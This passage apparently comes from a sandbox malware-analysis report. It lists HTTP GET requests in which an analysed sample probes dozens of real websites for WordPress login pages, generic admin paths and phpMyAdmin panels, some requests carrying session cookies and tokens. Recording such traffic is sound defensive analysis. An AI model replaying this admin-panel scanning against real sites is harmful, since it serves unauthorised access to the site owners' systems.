Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: gruporegiosafety.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: ce-logic.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: getquipu.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: belongfbg.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: www.rechagricola.com.brAccept: */*Accept-Encoding: deflate, gzipCookie: originDirect=trueUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.rech.com/
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: www.linkan-group.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: esoft.academyAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: www.harasduberry.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /domain_profile.cfm?d=robinsonland.com HTTP/1.1Host: www.hugedomains.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: tradeavenida.comAccept: */*Accept-Encoding: deflate, gzipCookie: _cfuvid=Y9iVqDLjjy.4c42u423kB35hFI4xb1W3CLV4ZRxyw.Y-1700978381430-0-604800000User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: www.2brospw.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /404/ HTTP/1.1Host: www.grg17geblergasse.atAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://www.grg17geblergasse.at/-/-/-/-/-/-/-/-/-/-/
Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: wonka.ccAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: beachrecruitment.comAccept: */*Accept-Encoding: deflate, gzipCookie: k8spersistent=4f36ac64dc73c26adfab9dad01788b38|11f187638643e13d7bd1963991fac52b; OF=9lma3oral9i39bi8q8vm70o157User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://beachrecruitment.com/wp-login.php
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: hightideinc.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: himontessori.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: coralparkchristian.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: getquipu.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin/ HTTP/1.1Host: edgewater.groupAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /saml/index.php?page=%2Fphpmyadmin%2F HTTP/1.1Host: my.calvary.qld.edu.auAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=m8r73sfk2fugohr6q21ktgilm1User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp/wp-login.php HTTP/1.1Host: www.ceuandalucia.esAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: beachrecruitment.comAccept: */*Accept-Encoding: deflate, gzipCookie: k8spersistent=22cb6f4364865b2e22019c7dac43ae73|11f187638643e13d7bd1963991fac52b; OF=9et5pla7nsi6m08nuam1qvco53User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: rech.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: avient.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /en/admin HTTP/1.1Host: www.dstaq.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: www.perrisesd.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: micro-design.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: www.knu.ac.inAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: jamiesonmullin.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /login/?page=%2Fadministrator%2Findex.php HTTP/1.1Host: my.calvary.qld.edu.auAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=0o33saodno7vmroa695q9i7ie9User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://login.microsoftonline.com/c8f4395e-fa4e-4196-adb9-ba2cd2ca09f0/saml2?SAMLRequest=fZJRb9owFIXf%2BRVV3uM4CaGJBUisrC0SA1TYHvYyXeybYsmxU9tpx79fiLd1mzTu4%2FE9n8498tRBo1q26PxJP%2BFLh86Pbvr53ijt2PA4izqrmQEnHdPQoGOes%2F3i05plhLLWGm%2B4UdE%2FtusucA6tl0YH22o5i7abj%2Bvtw2rzbZJCxbEu6FHc5hWnNE2xHFdlWRcgUBR5QUHkcBusX9C6njOLemw0CjTnOlxp50H7XqdZHqdpnE0OtGBFxfLya7Au%2B2OlBj%2FYT963jiWJMs9Sk0Zya5ypvdFKaiTcNAkv63FeFRjXMMZ4nFaTGMSxio%2BQcZFxoFVNk8vpWcDvfjbzQWoh9fP1Qo5hybHHw2EX77b7Q4AsfhV1Z7TrGrR7tK%2BS4%2Ben9Xvm5kw4qFewZ%2FKiBEHREeiGKAkPNtKe2mg%2BEKcXnQ0d2flVwjT5c%2FXd3LJNn3%2B13Bkl%2BXnQL3NvbAP%2B%2F2emJB0UKeJ6WGWddi1yWUsU0W%2FMQinzdmcRPM4ibzuMbpL5KGT5%2B6POfwA%3D&RelayState=%2Fadministrator%2F
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: mydirectlender.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin/pages/ HTTP/1.1Host: ce-logic.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: www.perrisesd.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /domain_profile.cfm?d=robinsonland.com HTTP/1.1Host: www.hugedomains.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: himontessori.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: www.maxiv.lu.seAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: esoft.academyAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: gatewaytoearlylearning.comAccept: */*Accept-Encoding: deflate, gzipCookie: PublishedSiteSession=eyJpdiI6IkRGblFZYmpUVTZaZXRlak41aDlickE9PSIsInZhbHVlIjoicDZZcjdvK2hoOHJhUmp5VXBPRmJnOXQxRDJkRXdNZnVUaUlZUWZNajY4Vlo5WUNZTG1ISDdVT1cwb1N4S0Y2MHZZU3hwODdRWDZWNjBFa251cXl2MGgvSFp3UEl6ZzNUME82N3Y1MVY5MGU5MmIyTWdKWDNNNXhMdGhMQ0RnRjAiLCJtYWMiOiI3N2M0YTFhMGY2YTc5NDgzMTIxNTNkZTA1YjY5Njk5YWJhYTE2Mzc4YzM5ODg5OWY1ZTNmYzNjYmI2NzQ3NDA5IiwidGFnIjoiIn0%3D; publishedsite-xsrf=eyJpdiI6Ii9HaFdPWjhha0p0ZmprRks4OFhJMnc9PSIsInZhbHVlIjoiaWRxOTdEeUg5dVJqRHVtQ0g1R3VNUWJwSDFiZUkzMWNMUWQ3ZWU5bFNpS0t4Q0ViWExvRUJDamxtNkNwaVp1V205NHVvVlJlQUVRdVVsUzJEWEFwbnk3UzBtSHZscmc5UWZ4dkpxS1grRUY0WHAyQ1ZqZkRsOTNWakxwd21DZVMiLCJtYWMiOiI5ZmIxZGJiZmFiZjJlMzZjYTVjN2ZiODE0ZmMyZDlkNTQzNmFkMWRlOGI0YjBmMDhkOWZjNGNlZmZiMmI3ZjgzIiwidGFnIjoiIn0%3D; XSRF-TOKEN=eyJpdiI6IjUxMTZseFR4OVdFOURpd3BzcUZ1TFE9PSIsInZhbHVlIjoiT1VlNmdtbmVOaityUVE0UzY3Qjh6TFUyeVEzUzBaL29ldUs3ZjBFbC9iV3FHdG9JQmlQampzeUdwOVg4Zk5vYytQdXJTd0dGK1M1ZVZ3MzFBVHRRRE0rMDFIbWZwaHVveEMrQXB4TTlvVjJIRTE2LytvdkZHNStHb0RTanAwajciLCJtYWMiOiI2ODUzMmM0MDU0YzY4ZjJlMzBjMjUwNTFjMjYyN2E2Y2Q4Y2Y5ODk4Y2QxYjIxNTVkYjExOTE2NzRmZDUyNWViIiwidGFnIjoiIn0%3DUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: eco-landeck.atAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /PhpMyAdmin HTTP/1.1Host: gatewaytoearlylearning.comAccept: */*Accept-Encoding: deflate, gzipCookie: PublishedSiteSession=eyJpdiI6ImFaN0VzMVVDbXAvRDkyTnVRTzV0dXc9PSIsInZhbHVlIjoiQ1RrUXRVb0ZpRlFJbEpYRG82SUhOc0tBL1l1enluT3MyWkE0cVVlb1czK21aUitnQUlQUWl3bmZkOEtINTBFRlZ6UG1RSVNNU01zK3AyS2R3c25WbXlqVFRubnp0VVNpVGJWVlI5d2d2STlkK1dvRHN3WmZXcktLUVZ4WVR0OHoiLCJtYWMiOiI4ODk3YmFiZWJhNWQ1OGM4OTM4YjdmNGJmYWI5M2JiM2Q1YjEyOGU2NTE1ZDE4MmE0MTFlOTc4OGIyZGUzNzAyIiwidGFnIjoiIn0%3D; publishedsite-xsrf=eyJpdiI6InVZN29GKzIwOFdCWTc0d3k1Y1J6OWc9PSIsInZhbHVlIjoiUnJhQ3h1dkxsVDJvOW1HeFFna3pqN2FsRWpPMEwwSjFwNVQwNjlmVUJkUmhjRjA5VXNaSTBkcGNUV0E2UXJNOGluNzN2bzhHN3Bnc2xySDQxdlNUVkp4OGhzSDlFNnR0SUtISHBETzhIUjMzcE83MWtjc2dOL3hnMHpiWWQ1Q20iLCJtYWMiOiI0NzYxMjc3MWRkYjMxOTk5NDRjNjc4ZTY5MDJjY2U2OTk3ZjgwMjc1Yzg5ZDFmOGEzMzRhMGViNmI1YTU3NGQ4IiwidGFnIjoiIn0%3D; XSRF-TOKEN=eyJpdiI6InpSM1A3WnZQd1FBWE0zYndjS3lTMVE9PSIsInZhbHVlIjoiSVV2dW5TdHArb1liMVNCeG5EVjFwR1RJN1dWYmhLRE5scXJaOXFyVlF2d1RkcXNSVnZkTk5xeWJCTkh6dFl4STF4NzIwL25sWTZJUUs4T1hvYzBTKzBwWi9HZDZSR0lreDlFQzBkanB3eTFLWHExbTg3SmM3Rm9raklEZmFBL08iLCJtYWMiOiJlNjI4YTJlZjk4YTk5M2MzYzRkMTAwNmY2NTNiMzIxZmY1MzE1MGM0Y2VhMDc5YmFmYTRkMjk3YTgzYzZiZDY2IiwidGFnIjoiIn0%3DUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: webstamp.caAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: grantstech.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.grantstech.io/wp-login.php
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: unaj.edu.peAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: samson.peAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: www.avient.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: www.linkan-group.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: www.beachrecruitment.comAccept: */*Accept-Encoding: deflate, gzipCookie: OF=9lma3oral9i39bi8q8vm70o157User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://beachrecruitment.com/wp-login.php
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: rech.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.rech.com/
Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: bunasta.euAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://bunasta.eu/wp-login.php
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: gccb.co.inAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /Security/login?BackURL=%2Fadmin%2Fpages%2F HTTP/1.1Host: ce-logic.comAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=90qdef5au19fnromgduipcu8s5User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: www.2brospw.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php?redirect_to=https%3A%2F%2Ftradeavenida.com%2Fwp-admin%2F&reauth=1 HTTP/1.1Host: tradeavenida.comAccept: */*Accept-Encoding: deflate, gzipCookie: _cfuvid=Y9iVqDLjjy.4c42u423kB35hFI4xb1W3CLV4ZRxyw.Y-1700978381430-0-604800000User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: avient.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: lumaruniformes.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: engel-firm.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /en/admin HTTP/1.1Host: www.dstaq.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: www.maxiv.lu.seAccept: */*Accept-Encoding: deflate, gzipCookie: ff59ae34f86788aafc83adbd6fbb16ab=573a080441b430e46540f849b8105044User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.maxiv.lu.se/
Source: global trafficHTTP traffic detected: GET /admin/ HTTP/1.1Host: jamiesonmullin.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /domain_profile.cfm?d=robinsonland.com HTTP/1.1Host: www.hugedomains.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: esoft.academyAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /pma HTTP/1.1Host: esoft.academyAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: www.grantstech.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: www.beachrecruitment.comAccept: */*Accept-Encoding: deflate, gzipCookie: OF=9et5pla7nsi6m08nuam1qvco53User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: talentius.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.rech.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /domain_profile.cfm?d=robinsonland.com HTTP/1.1Host: www.hugedomains.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: tiswheels.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: tradeavenida.comAccept: */*Accept-Encoding: deflate, gzipCookie: _cfuvid=GmdO4O16OvcSRs1S5vpImz7iIXsw5EPzJkhrzhXEoHc-1700978384404-0-604800000User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: daisyokogyo.co.jpAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: www.harasduberry.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php?redirect_to=https%3A%2F%2Fhimontessori.com%2Fwp-admin%2F&reauth=1 HTTP/1.1Host: himontessori.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: www.linkan-group.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: www.perrisesd.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: www.ceuandalucia.esAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: www.harasduberry.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin/ HTTP/1.1Host: unaj.edu.peAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: www.grantstech.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.grantstech.io/wp-login.php
Source: global trafficHTTP traffic detected: GET /admin/ HTTP/1.1Host: www.perrisesd.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /PhpMyAdmin HTTP/1.1Host: www.gatewaytoearlylearning.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: www.avient.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: www.gatewaytoearlylearning.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin/ HTTP/1.1Host: webstamp.caAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /saml/index.php?page=%2Fadministrator%2Findex.php HTTP/1.1Host: my.calvary.qld.edu.auAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=0o33saodno7vmroa695q9i7ie9User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://login.microsoftonline.com/c8f4395e-fa4e-4196-adb9-ba2cd2ca09f0/saml2?SAMLRequest=fZJRb9owFIXf%2BRVV3uM4CaGJBUisrC0SA1TYHvYyXeybYsmxU9tpx79fiLd1mzTu4%2FE9n8498tRBo1q26PxJP%2BFLh86Pbvr53ijt2PA4izqrmQEnHdPQoGOes%2F3i05plhLLWGm%2B4UdE%2FtusucA6tl0YH22o5i7abj%2Bvtw2rzbZJCxbEu6FHc5hWnNE2xHFdlWRcgUBR5QUHkcBusX9C6njOLemw0CjTnOlxp50H7XqdZHqdpnE0OtGBFxfLya7Au%2B2OlBj%2FYT963jiWJMs9Sk0Zya5ypvdFKaiTcNAkv63FeFRjXMMZ4nFaTGMSxio%2BQcZFxoFVNk8vpWcDvfjbzQWoh9fP1Qo5hybHHw2EX77b7Q4AsfhV1Z7TrGrR7tK%2BS4%2Ben9Xvm5kw4qFewZ%2FKiBEHREeiGKAkPNtKe2mg%2BEKcXnQ0d2flVwjT5c%2FXd3LJNn3%2B13Bkl%2BXnQL3NvbAP%2B%2F2emJB0UKeJ6WGWddi1yWUsU0W%2FMQinzdmcRPM4ibzuMbpL5KGT5%2B6POfwA%3D&RelayState=%2Fadministrator%2F
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: getquipu.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: ce-logic.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: student.debritto.sch.idAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.rech.comAccept: */*Accept-Encoding: deflate, gzipCookie: originDirect=true; SESSION=d0ba3db7-afea-40d5-bf45-8ca13b5deab0User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.rech.com/
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: getquipu.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
